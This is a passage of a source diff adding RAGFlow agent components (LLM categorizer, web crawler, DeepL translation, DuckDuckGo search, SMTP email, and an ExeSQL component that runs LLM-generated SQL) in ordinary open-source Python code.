+ descriptions.append(
53
+ "--------------------\nCategory: {}\nDescription: {}\n".format(c, desc["description"]))
54
+
55
+ self.prompt = """
56
+ You're a text classifier. You need to categorize the user’s questions into {} categories,
57
+ namely: {}
58
+ Here's description of each category:
59
+ {}
60
+
61
+ You could learn from the following examples:
62
+ {}
63
+ You could learn from the above examples.
64
+ Just mention the category names, no need for any additional words.
65
+
66
+ ---- Real Data ----
67
+ {}
68
+ """.format(
69
+ len(self.category_description.keys()),
70
+ "/".join(list(self.category_description.keys())),
71
+ "\n".join(descriptions),
72
+ "- ".join(cate_lines),
73
+ chat_hist
74
+ )
75
+ return self.prompt
76
+
77
+
78
+ class Categorize(Generate, ABC):
79
+ component_name = "Categorize"
80
+
81
+ def _run(self, history, **kwargs):
82
+ input = self.get_input()
83
+ input = " - ".join(input["content"]) if "content" in input else ""
84
+ chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
85
+ ans = chat_mdl.chat(self._param.get_prompt(input), [{"role": "user", "content": "\nCategory: "}],
86
+ self._param.gen_conf())
87
+ logging.debug(f"input: {input}, answer: {str(ans)}")
88
+ for c in self._param.category_description.keys():
89
+ if ans.lower().find(c.lower()) >= 0:
90
+ return Categorize.be_output(self._param.category_description[c]["to"])
91
+
92
+ return Categorize.be_output(list(self._param.category_description.items())[-1][1]["to"])
93
+
94
+ def debug(self, **kwargs):
95
+ df = self._run([], **kwargs)
96
+ cpn_id = df.iloc[0, 0]
97
+ return Categorize.be_output(self._canvas.get_compnent_name(cpn_id))
98
+
ragflow-main/agent/component/concentrator.py ADDED
@@ -0,0 +1,36 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from abc import ABC
17
+ from agent.component.base import ComponentBase, ComponentParamBase
18
+
19
+
20
+ class ConcentratorParam(ComponentParamBase):
21
+ """
22
+ Define the Concentrator component parameters.
23
+ """
24
+
25
+ def __init__(self):
26
+ super().__init__()
27
+
28
+ def check(self):
29
+ return True
30
+
31
+
32
+ class Concentrator(ComponentBase, ABC):
33
+ component_name = "Concentrator"
34
+
35
+ def _run(self, history, **kwargs):
36
+ return Concentrator.be_output("")
ragflow-main/agent/component/crawler.py ADDED
@@ -0,0 +1,67 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from abc import ABC
17
+ import asyncio
18
+ from crawl4ai import AsyncWebCrawler
19
+ from agent.component.base import ComponentBase, ComponentParamBase
20
+ from api.utils.web_utils import is_valid_url
21
+
22
+
23
+ class CrawlerParam(ComponentParamBase):
24
+ """
25
+ Define the Crawler component parameters.
26
+ """
27
+
28
+ def __init__(self):
29
+ super().__init__()
30
+ self.proxy = None
31
+ self.extract_type = "markdown"
32
+
33
+ def check(self):
34
+ self.check_valid_value(self.extract_type, "Type of content from the crawler", ['html', 'markdown', 'content'])
35
+
36
+
37
+ class Crawler(ComponentBase, ABC):
38
+ component_name = "Crawler"
39
+
40
+ def _run(self, history, **kwargs):
41
+ ans = self.get_input()
42
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
43
+ if not is_valid_url(ans):
44
+ return Crawler.be_output("URL not valid")
45
+ try:
46
+ result = asyncio.run(self.get_web(ans))
47
+
48
+ return Crawler.be_output(result)
49
+
50
+ except Exception as e:
51
+ return Crawler.be_output(f"An unexpected error occurred: {str(e)}")
52
+
53
+ async def get_web(self, url):
54
+ proxy = self._param.proxy if self._param.proxy else None
55
+ async with AsyncWebCrawler(verbose=True, proxy=proxy) as crawler:
56
+ result = await crawler.arun(
57
+ url=url,
58
+ bypass_cache=True
59
+ )
60
+
61
+ if self._param.extract_type == 'html':
62
+ return result.cleaned_html
63
+ elif self._param.extract_type == 'markdown':
64
+ return result.markdown
65
+ elif self._param.extract_type == 'content':
66
+ result.extracted_content
67
+ return result.markdown
ragflow-main/agent/component/deepl.py ADDED
@@ -0,0 +1,61 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from abc import ABC
17
+ from agent.component.base import ComponentBase, ComponentParamBase
18
+ import deepl
19
+
20
+
21
+ class DeepLParam(ComponentParamBase):
22
+ """
23
+ Define the DeepL component parameters.
24
+ """
25
+
26
+ def __init__(self):
27
+ super().__init__()
28
+ self.auth_key = "xxx"
29
+ self.parameters = []
30
+ self.source_lang = 'ZH'
31
+ self.target_lang = 'EN-GB'
32
+
33
+ def check(self):
34
+ self.check_positive_integer(self.top_n, "Top N")
35
+ self.check_valid_value(self.source_lang, "Source language",
36
+ ['AR', 'BG', 'CS', 'DA', 'DE', 'EL', 'EN', 'ES', 'ET', 'FI', 'FR', 'HU', 'ID', 'IT',
37
+ 'JA', 'KO', 'LT', 'LV', 'NB', 'NL', 'PL', 'PT', 'RO', 'RU', 'SK', 'SL', 'SV', 'TR',
38
+ 'UK', 'ZH'])
39
+ self.check_valid_value(self.target_lang, "Target language",
40
+ ['AR', 'BG', 'CS', 'DA', 'DE', 'EL', 'EN-GB', 'EN-US', 'ES', 'ET', 'FI', 'FR', 'HU',
41
+ 'ID', 'IT', 'JA', 'KO', 'LT', 'LV', 'NB', 'NL', 'PL', 'PT-BR', 'PT-PT', 'RO', 'RU',
42
+ 'SK', 'SL', 'SV', 'TR', 'UK', 'ZH'])
43
+
44
+
45
+ class DeepL(ComponentBase, ABC):
46
+ component_name = "GitHub"
47
+
48
+ def _run(self, history, **kwargs):
49
+ ans = self.get_input()
50
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
51
+ if not ans:
52
+ return DeepL.be_output("")
53
+
54
+ try:
55
+ translator = deepl.Translator(self._param.auth_key)
56
+ result = translator.translate_text(ans, source_lang=self._param.source_lang,
57
+ target_lang=self._param.target_lang)
58
+
59
+ return DeepL.be_output(result.text)
60
+ except Exception as e:
61
+ DeepL.be_output("**Error**:" + str(e))
ragflow-main/agent/component/duckduckgo.py ADDED
@@ -0,0 +1,66 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ from duckduckgo_search import DDGS
19
+ import pandas as pd
20
+ from agent.component.base import ComponentBase, ComponentParamBase
21
+
22
+
23
+ class DuckDuckGoParam(ComponentParamBase):
24
+ """
25
+ Define the DuckDuckGo component parameters.
26
+ """
27
+
28
+ def __init__(self):
29
+ super().__init__()
30
+ self.top_n = 10
31
+ self.channel = "text"
32
+
33
+ def check(self):
34
+ self.check_positive_integer(self.top_n, "Top N")
35
+ self.check_valid_value(self.channel, "Web Search or News", ["text", "news"])
36
+
37
+
38
+ class DuckDuckGo(ComponentBase, ABC):
39
+ component_name = "DuckDuckGo"
40
+
41
+ def _run(self, history, **kwargs):
42
+ ans = self.get_input()
43
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
44
+ if not ans:
45
+ return DuckDuckGo.be_output("")
46
+
47
+ try:
48
+ if self._param.channel == "text":
49
+ with DDGS() as ddgs:
50
+ # {'title': '', 'href': '', 'body': ''}
51
+ duck_res = [{"content": '<a href="' + i["href"] + '">' + i["title"] + '</a> ' + i["body"]} for i
52
+ in ddgs.text(ans, max_results=self._param.top_n)]
53
+ elif self._param.channel == "news":
54
+ with DDGS() as ddgs:
55
+ # {'date': '', 'title': '', 'body': '', 'url': '', 'image': '', 'source': ''}
56
+ duck_res = [{"content": '<a href="' + i["url"] + '">' + i["title"] + '</a> ' + i["body"]} for i
57
+ in ddgs.news(ans, max_results=self._param.top_n)]
58
+ except Exception as e:
59
+ return DuckDuckGo.be_output("**ERROR**: " + str(e))
60
+
61
+ if not duck_res:
62
+ return DuckDuckGo.be_output("")
63
+
64
+ df = pd.DataFrame(duck_res)
65
+ logging.debug("df: {df}")
66
+ return df
ragflow-main/agent/component/email.py ADDED
@@ -0,0 +1,138 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+
17
+ from abc import ABC
18
+ import json
19
+ import smtplib
20
+ import logging
21
+ from email.mime.text import MIMEText
22
+ from email.mime.multipart import MIMEMultipart
23
+ from email.header import Header
24
+ from email.utils import formataddr
25
+ from agent.component.base import ComponentBase, ComponentParamBase
26
+
27
+ class EmailParam(ComponentParamBase):
28
+ """
29
+ Define the Email component parameters.
30
+ """
31
+ def __init__(self):
32
+ super().__init__()
33
+ # Fixed configuration parameters
34
+ self.smtp_server = "" # SMTP server address
35
+ self.smtp_port = 465 # SMTP port
36
+ self.email = "" # Sender email
37
+ self.password = "" # Email authorization code
38
+ self.sender_name = "" # Sender name
39
+
40
+ def check(self):
41
+ # Check required parameters
42
+ self.check_empty(self.smtp_server, "SMTP Server")
43
+ self.check_empty(self.email, "Email")
44
+ self.check_empty(self.password, "Password")
45
+ self.check_empty(self.sender_name, "Sender Name")
46
+
47
+ class Email(ComponentBase, ABC):
48
+ component_name = "Email"
49
+
50
+ def _run(self, history, **kwargs):
51
+ # Get upstream component output and parse JSON
52
+ ans = self.get_input()
53
+ content = "".join(ans["content"]) if "content" in ans else ""
54
+ if not content:
55
+ return Email.be_output("No content to send")
56
+
57
+ success = False
58
+ try:
59
+ # Parse JSON string passed from upstream
60
+ email_data = json.loads(content)
61
+
62
+ # Validate required fields
63
+ if "to_email" not in email_data:
64
+ return Email.be_output("Missing required field: to_email")
65
+
66
+ # Create email object
67
+ msg = MIMEMultipart('alternative')
68
+
69
+ # Properly handle sender name encoding
70
+ msg['From'] = formataddr((str(Header(self._param.sender_name,'utf-8')), self._param.email))
71
+ msg['To'] = email_data["to_email"]
72
+ if "cc_email" in email_data and email_data["cc_email"]:
73
+ msg['Cc'] = email_data["cc_email"]
74
+ msg['Subject'] = Header(email_data.get("subject", "No Subject"), 'utf-8').encode()
75
+
76
+ # Use content from email_data or default content
77
+ email_content = email_data.get("content", "No content provided")
78
+ # msg.attach(MIMEText(email_content, 'plain', 'utf-8'))
79
+ msg.attach(MIMEText(email_content, 'html', 'utf-8'))
80
+
81
+ # Connect to SMTP server and send
82
+ logging.info(f"Connecting to SMTP server {self._param.smtp_server}:{self._param.smtp_port}")
83
+
84
+ context = smtplib.ssl.create_default_context()
85
+ with smtplib.SMTP_SSL(self._param.smtp_server, self._param.smtp_port, context=context) as server:
86
+ # Login
87
+ logging.info(f"Attempting to login with email: {self._param.email}")
88
+ server.login(self._param.email, self._param.password)
89
+
90
+ # Get all recipient list
91
+ recipients = [email_data["to_email"]]
92
+ if "cc_email" in email_data and email_data["cc_email"]:
93
+ recipients.extend(email_data["cc_email"].split(','))
94
+
95
+ # Send email
96
+ logging.info(f"Sending email to recipients: {recipients}")
97
+ try:
98
+ server.send_message(msg, self._param.email, recipients)
99
+ success = True
100
+ except Exception as e:
101
+ logging.error(f"Error during send_message: {str(e)}")
102
+ # Try alternative method
103
+ server.sendmail(self._param.email, recipients, msg.as_string())
104
+ success = True
105
+
106
+ try:
107
+ server.quit()
108
+ except Exception as e:
109
+ # Ignore errors when closing connection
110
+ logging.warning(f"Non-fatal error during connection close: {str(e)}")
111
+
112
+ if success:
113
+ return Email.be_output("Email sent successfully")
114
+
115
+ except json.JSONDecodeError:
116
+ error_msg = "Invalid JSON format in input"
117
+ logging.error(error_msg)
118
+ return Email.be_output(error_msg)
119
+
120
+ except smtplib.SMTPAuthenticationError:
121
+ error_msg = "SMTP Authentication failed. Please check your email and authorization code."
122
+ logging.error(error_msg)
123
+ return Email.be_output(f"Failed to send email: {error_msg}")
124
+
125
+ except smtplib.SMTPConnectError:
126
+ error_msg = f"Failed to connect to SMTP server {self._param.smtp_server}:{self._param.smtp_port}"
127
+ logging.error(error_msg)
128
+ return Email.be_output(f"Failed to send email: {error_msg}")
129
+
130
+ except smtplib.SMTPException as e:
131
+ error_msg = f"SMTP error occurred: {str(e)}"
132
+ logging.error(error_msg)
133
+ return Email.be_output(f"Failed to send email: {error_msg}")
134
+
135
+ except Exception as e:
136
+ error_msg = f"Unexpected error: {str(e)}"
137
+ logging.error(error_msg)
138
+ return Email.be_output(f"Failed to send email: {error_msg}")
ragflow-main/agent/component/exesql.py ADDED
@@ -0,0 +1,155 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from abc import ABC
17
+ import re
18
+ from copy import deepcopy
19
+
20
+ import pandas as pd
21
+ import pymysql
22
+ import psycopg2
23
+ from agent.component import GenerateParam, Generate
24
+ import pyodbc
25
+ import logging
26
+
27
+
28
+ class ExeSQLParam(GenerateParam):
29
+ """
30
+ Define the ExeSQL component parameters.
31
+ """
32
+
33
+ def __init__(self):
34
+ super().__init__()
35
+ self.db_type = "mysql"
36
+ self.database = ""
37
+ self.username = ""
38
+ self.host = ""
39
+ self.port = 3306
40
+ self.password = ""
41
+ self.loop = 3
42
+ self.top_n = 30
43
+
44
+ def check(self):
45
+ super().check()
46
+ self.check_valid_value(self.db_type, "Choose DB type", ['mysql', 'postgresql', 'mariadb', 'mssql'])
47
+ self.check_empty(self.database, "Database name")
48
+ self.check_empty(self.username, "database username")
49
+ self.check_empty(self.host, "IP Address")
50
+ self.check_positive_integer(self.port, "IP Port")
51
+ self.check_empty(self.password, "Database password")
52
+ self.check_positive_integer(self.top_n, "Number of records")
53
+ if self.database == "rag_flow":
54
+ if self.host == "ragflow-mysql":
55
+ raise ValueError("The host is not accessible.")
56
+ if self.password == "infini_rag_flow":
57
+ raise ValueError("The host is not accessible.")
58
+
59
+
60
+ class ExeSQL(Generate, ABC):
61
+ component_name = "ExeSQL"
62
+
63
+ def _refactor(self,ans):
64
+ match = re.search(r"```sql\s*(.*?)\s*```", ans, re.DOTALL)
65
+ if match:
66
+ ans = match.group(1) # Query content
67
+ return ans
68
+ else:
69
+ print("no markdown")
70
+ ans = re.sub(r'^.*?SELECT ', 'SELECT ', (ans), flags=re.IGNORECASE)
71
+ ans = re.sub(r';.*?SELECT ', '; SELECT ', ans, flags=re.IGNORECASE)
72
+ ans = re.sub(r';[^;]*$', r';', ans)
73
+ if not ans:
74
+ raise Exception("SQL statement not found!")
75
+ return ans
76
+
77
+ def _run(self, history, **kwargs):
78
+ ans = self.get_input()
79
+ ans = "".join([str(a) for a in ans["content"]]) if "content" in ans else ""
80
+ ans = self._refactor(ans)
81
+ logging.info("db_type: ",self._param.db_type)
82
+ if self._param.db_type in ["mysql", "mariadb"]:
83
+ db = pymysql.connect(db=self._param.database, user=self._param.username, host=self._param.host,
84
+ port=self._param.port, password=self._param.password)
85
+ elif self._param.db_type == 'postgresql':
86
+ db = psycopg2.connect(dbname=self._param.database, user=self._param.username, host=self._param.host,
87
+ port=self._param.port, password=self._param.password)
88
+ elif self._param.db_type == 'mssql':
89
+ conn_str = (
90
+ r'DRIVER={ODBC Driver 17 for SQL Server};'
91
+ r'SERVER=' + self._param.host + ',' + str(self._param.port) + ';'
92
+ r'DATABASE=' + self._param.database + ';'
93
+ r'UID=' + self._param.username + ';'
94
+ r'PWD=' + self._param.password
95
+ )
96
+ db = pyodbc.connect(conn_str)
97
+ try:
98
+ cursor = db.cursor()
99
+ except Exception as e:
100
+ raise Exception("Database Connection Failed! \n" + str(e))
101
+ if not hasattr(self, "_loop"):
102
+ setattr(self, "_loop", 0)
103
+ self._loop += 1
104
+ input_list=re.split(r';', ans.replace(r"\n", " "))
105
+ sql_res = []
106
+ for i in range(len(input_list)):
107
+ single_sql=input_list[i]
108
+ while self._loop <= self._param.loop:
109
+ self._loop+=1
110
+ if not single_sql:
111
+ break
112
+ try:
113
+ logging.info("single_sql: ", single_sql)
114
+ cursor.execute(single_sql)
115
+ if cursor.rowcount == 0:
116
+ sql_res.append({"content": "No record in the database!"})
117
+ break
118
+ if self._param.db_type == 'mssql':
119
+ single_res = pd.DataFrame.from_records(cursor.fetchmany(self._param.top_n),columns = [desc[0] for desc in cursor.description])
120
+ else:
121
+ single_res = pd.DataFrame([i for i in cursor.fetchmany(self._param.top_n)])
122
+ single_res.columns = [i[0] for i in cursor.description]
123
+ sql_res.append({"content": single_res.to_markdown()})
124
+ break
125
+ except Exception as e:
126
+ single_sql = self._regenerate_sql(single_sql, str(e), **kwargs)
127
+ single_sql = self._refactor(single_sql)
128
+ if self._loop > self._param.loop:
129
+ sql_res.append({"content": "Can't query the correct data via SQL statement."})
130
+ # raise Exception("Maximum loop time exceeds. Can't query the correct data via SQL statement.")
131
+ db.close()
132
+ if not sql_res:
133
+ return ExeSQL.be_output("")
134
+ return pd.DataFrame(sql_res)
135
+
136
+ def _regenerate_sql(self, failed_sql, error_message,**kwargs):
137
+ prompt = f'''
138
+ ## You are the Repair SQL Statement Helper, please modify the original SQL statement based on the SQL query error report.
139
+ ## The original SQL statement is as follows:{failed_sql}.
140
+ ## The contents of the SQL query error report is as follows:{error_message}.
141
+ ## Answer only the modified SQL statement. Please do not give any explanation, just answer the code.
142
+ '''
143
+ self._param.prompt=prompt
144
+ kwargs_ = deepcopy(kwargs)
145
+ kwargs_["stream"] = False
146
+ response = Generate._run(self, [], **kwargs_)
147
+ try:
148
+ regenerated_sql = response.loc[0,"content"]
149
+ return regenerated_sql
150
+ except Exception as e:
151
+ logging.error(f"Failed to regenerate SQL: {e}")
152
+ return None
153
+
154
+ def debug(self, **kwargs):
155
+ return self._run([], **kwargs)
ragflow-main/agent/component/generate.py ADDED
@@ -0,0 +1,247 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import re
17
+ from functools import partial
18
+ import pandas as pd
19
+ from api.db import LLMType
20
+ from api.db.services.conversation_service import structure_answer
21
+ from api.db.services.dialog_service import message_fit_in
22
+ from api.db.services.llm_service import LLMBundle
23
+ from api import settings
24
+ from agent.component.base import ComponentBase, ComponentParamBase
25
+
26
+
27
+ class GenerateParam(ComponentParamBase):
28
+ """
29
+ Define the Generate component parameters.
30
+ """
31
+
32
+ def __init__(self):
33
+ super().__init__()
34
+ self.llm_id = ""
35
+ self.prompt = ""
36
+ self.max_tokens = 0
37
+ self.temperature = 0
38
+ self.top_p = 0
39
+ self.presence_penalty = 0
40
+ self.frequency_penalty = 0
41
+ self.cite = True
42
+ self.parameters = []
43
+
44
+ def check(self):
45
+ self.check_decimal_float(self.temperature, "[Generate] Temperature")
46
+ self.check_decimal_float(self.presence_penalty, "[Generate] Presence penalty")
47
+ self.check_decimal_float(self.frequency_penalty, "[Generate] Frequency penalty")
48
+ self.check_nonnegative_number(self.max_tokens, "[Generate] Max tokens")
49
+ self.check_decimal_float(self.top_p, "[Generate] Top P")
50
+ self.check_empty(self.llm_id, "[Generate] LLM")
51
+ # self.check_defined_type(self.parameters, "Parameters", ["list"])
52
+
53
+ def gen_conf(self):
54
+ conf = {}
55
+ if self.max_tokens > 0:
56
+ conf["max_tokens"] = self.max_tokens
57
+ if self.temperature > 0:
58
+ conf["temperature"] = self.temperature
59
+ if self.top_p > 0:
60
+ conf["top_p"] = self.top_p
61
+ if self.presence_penalty > 0:
62
+ conf["presence_penalty"] = self.presence_penalty
63
+ if self.frequency_penalty > 0:
64
+ conf["frequency_penalty"] = self.frequency_penalty
65
+ return conf
66
+
67
+
68
+ class Generate(ComponentBase):
69
+ component_name = "Generate"
70
+
71
+ def get_dependent_components(self):
72
+ inputs = self.get_input_elements()
73
+ cpnts = set([i["key"] for i in inputs[1:] if i["key"].lower().find("answer") < 0 and i["key"].lower().find("begin") < 0])
74
+ return list(cpnts)
75
+
76
+ def set_cite(self, retrieval_res, answer):
77
+ retrieval_res = retrieval_res.dropna(subset=["vector", "content_ltks"]).reset_index(drop=True)
78
+ if "empty_response" in retrieval_res.columns:
79
+ retrieval_res["empty_response"].fillna("", inplace=True)
80
+ answer, idx = settings.retrievaler.insert_citations(answer,
81
+ [ck["content_ltks"] for _, ck in retrieval_res.iterrows()],
82
+ [ck["vector"] for _, ck in retrieval_res.iterrows()],
83
+ LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING,
84
+ self._canvas.get_embedding_model()), tkweight=0.7,
85
+ vtweight=0.3)
86
+ doc_ids = set([])
87
+ recall_docs = []
88
+ for i in idx:
89
+ did = retrieval_res.loc[int(i), "doc_id"]
90
+ if did in doc_ids:
91
+ continue
92
+ doc_ids.add(did)
93
+ recall_docs.append({"doc_id": did, "doc_name": retrieval_res.loc[int(i), "docnm_kwd"]})
94
+
95
+ del retrieval_res["vector"]
96
+ del retrieval_res["content_ltks"]
97
+
98
+ reference = {
99
+ "chunks": [ck.to_dict() for _, ck in retrieval_res.iterrows()],
100
+ "doc_aggs": recall_docs
101
+ }
102
+
103
+ if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
104
+ answer += " Please set LLM API-Key in 'User Setting -> Model providers -> API-Key'"
105
+ res = {"content": answer, "reference": reference}
106
+ res = structure_answer(None, res, "", "")
107
+
108
+ return res
109
+
110
+ def get_input_elements(self):
111
+ key_set = set([])
112
+ res = [{"key": "user", "name": "Input your question here:"}]
113
+ for r in re.finditer(r"\{([a-z]+[:@][a-z0-9_-]+)\}", self._param.prompt, flags=re.IGNORECASE):
114
+ cpn_id = r.group(1)
115
+ if cpn_id in key_set:
116
+ continue
117
+ if cpn_id.lower().find("begin@") == 0:
118
+ cpn_id, key = cpn_id.split("@")
119
+ for p in self._canvas.get_component(cpn_id)["obj"]._param.query:
120
+ if p["key"] != key:
121
+ continue
122
+ res.append({"key": r.group(1), "name": p["name"]})
123
+ key_set.add(r.group(1))
124
+ continue
125
+ cpn_nm = self._canvas.get_compnent_name(cpn_id)
126
+ if not cpn_nm:
127
+ continue
128
+ res.append({"key": cpn_id, "name": cpn_nm})
129
+ key_set.add(cpn_id)
130
+ return res
131
+
132
+ def _run(self, history, **kwargs):
133
+ chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
134
+ prompt = self._param.prompt
135
+
136
+ retrieval_res = []
137
+ self._param.inputs = []
138
+ for para in self.get_input_elements()[1:]:
139
+ if para["key"].lower().find("begin@") == 0:
140
+ cpn_id, key = para["key"].split("@")
141
+ for p in self._canvas.get_component(cpn_id)["obj"]._param.query:
142
+ if p["key"] == key:
143
+ kwargs[para["key"]] = p.get("value", "")
144
+ self._param.inputs.append(
145
+ {"component_id": para["key"], "content": kwargs[para["key"]]})
146
+ break
147
+ else:
148
+ assert False, f"Can't find parameter '{key}' for {cpn_id}"
149
+ continue
150
+
151
+ component_id = para["key"]
152
+ cpn = self._canvas.get_component(component_id)["obj"]
153
+ if cpn.component_name.lower() == "answer":
154
+ hist = self._canvas.get_history(1)
155
+ if hist:
156
+ hist = hist[0]["content"]
157
+ else:
158
+ hist = ""
159
+ kwargs[para["key"]] = hist
160
+ continue
161
+ _, out = cpn.output(allow_partial=False)
162
+ if "content" not in out.columns:
163
+ kwargs[para["key"]] = ""
164
+ else:
165
+ if cpn.component_name.lower() == "retrieval":
166
+ retrieval_res.append(out)
167
+ kwargs[para["key"]] = " - " + "\n - ".join([o if isinstance(o, str) else str(o) for o in out["content"]])
168
+ self._param.inputs.append({"component_id": para["key"], "content": kwargs[para["key"]]})
169
+
170
+ if retrieval_res:
171
+ retrieval_res = pd.concat(retrieval_res, ignore_index=True)
172
+ else:
173
+ retrieval_res = pd.DataFrame([])
174
+
